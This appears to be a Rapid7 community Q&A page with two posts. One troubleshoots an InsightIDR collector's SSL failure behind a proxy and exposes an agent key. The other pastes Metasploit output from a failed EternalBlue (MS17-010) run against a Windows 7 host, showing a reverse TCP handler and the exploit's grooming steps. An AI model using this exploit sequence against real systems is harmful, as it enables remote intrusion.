Knowledge Base

Ask A Question

Questions

1

Insight Collector via Web Proxy

Hello, We are running a POC of InsightIDR and we are getting the following message (in bootstrap.log) when we try and activate a collector. Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger info INFO: RegistrationManager attempting to connect to the server: https://eu.data.insight.rapid7.com/api/1/collector/register Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger info INFO: **** Agent key for this Collector is: 311aa03d-7c6f-446b-a015-c85a113b4ff8 Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger error SEVERE: Registration process failed with exception javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target at sun.security.ssl.Alerts.getSSLException(Unknown Source) at sun.security.ssl.SSLSocketImpl.fatal(Unknown Source) at sun.security.ssl.Handshaker.fatalSE(Unknown Source) at sun.security.ssl.Handshaker.fatalSE(Unknown Source) at sun.security.ssl.ClientHandshaker.serverCertificate(Unknown Source) at sun.security.ssl.ClientHandshaker.processMessage(Unknown Source) at sun.security.ssl.Handshaker.processLoop(Unknown Source) at sun.security.ssl.Handshaker.process_record(Unknown Source) at sun.security.ssl.SSLSocketImpl.readRecord(Unknown Source) at sun.security.ssl.SSLSocketImpl.performInitialHandshake(Unknown Source) at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source) at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source) at sun.net.www.protocol.https.HttpsClient.afterConnect(Unknown Source) at sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(Unknown Source) at sun.net.www.protocol.http.HttpURLConnection.getInputStream(Unknown Source) at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(Unknown Source) at java.net.URL.openStream(Unknown Source) at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.registerWithServer(RegistrationManager.java:203) at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.doRegister(RegistrationManager.java:108) at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.checkRegistration(RegistrationManager.java:72) at com.rapid7.razor.collector.bootstrap.impl.BootstrapProcess.call(BootstrapProcess.java:46) at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source) at java.util.concurrent.FutureTask.run(Unknown Source) at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.lang.Thread.run(Unknown Source) Wireshark gives me a 59 30.875484 my collector ip my proxy ip TLSv1.2 61 Alert (Level: Fatal, Description: Certificate Unknown) We have allowed SSL pass through and the server can get to the site. Any ideas?

insightidr

Posted by Martin Austin about a year ago

3

Ethernal blue problem

I have this problem with windows/smb/ms17_010_eternalblue I use Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux [*] Started reverse TCP handler on "Lhost:port" [*] "Rhost IP:port" - Connecting to target for exploitation. [+] "Rhost IP:port" - Connection established for exploitation. [+] "Rhost IP:port" - Target OS selected valid for OS indicated by SMB reply [*] "Rhost IP:port" - CORE raw buffer dump (38 bytes) [*] "Rhost IP:port" - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] "Rhost IP:port" - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] "Rhost IP:port" - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] "Rhost IP:port" - Target arch selected valid for arch indicated by DCE/RPC reply [*] "Rhost IP:port" - Trying exploit with 12 Groom Allocations. [*] "Rhost IP:port" - Sending all but last fragment of exploit packet [*] "Rhost IP:port" - Starting non-paged pool grooming [+] "Rhost IP:port" - Sending SMBv2 buffers [+] "Rhost IP:port" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] "Rhost IP:port" - Sending final SMBv2 buffers. [*] "Rhost IP:port" - Sending last fragment of exploit packet! [*] "Rhost IP:port" - Receiving response from exploit packet [-] "Rhost IP:port" - Did not receive a response from exploit packet [*] "Rhost IP:port" - Sending egg to corrupted connection. [-] "Rhost IP:port" - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.

Posted by Jhon Dale about a year ago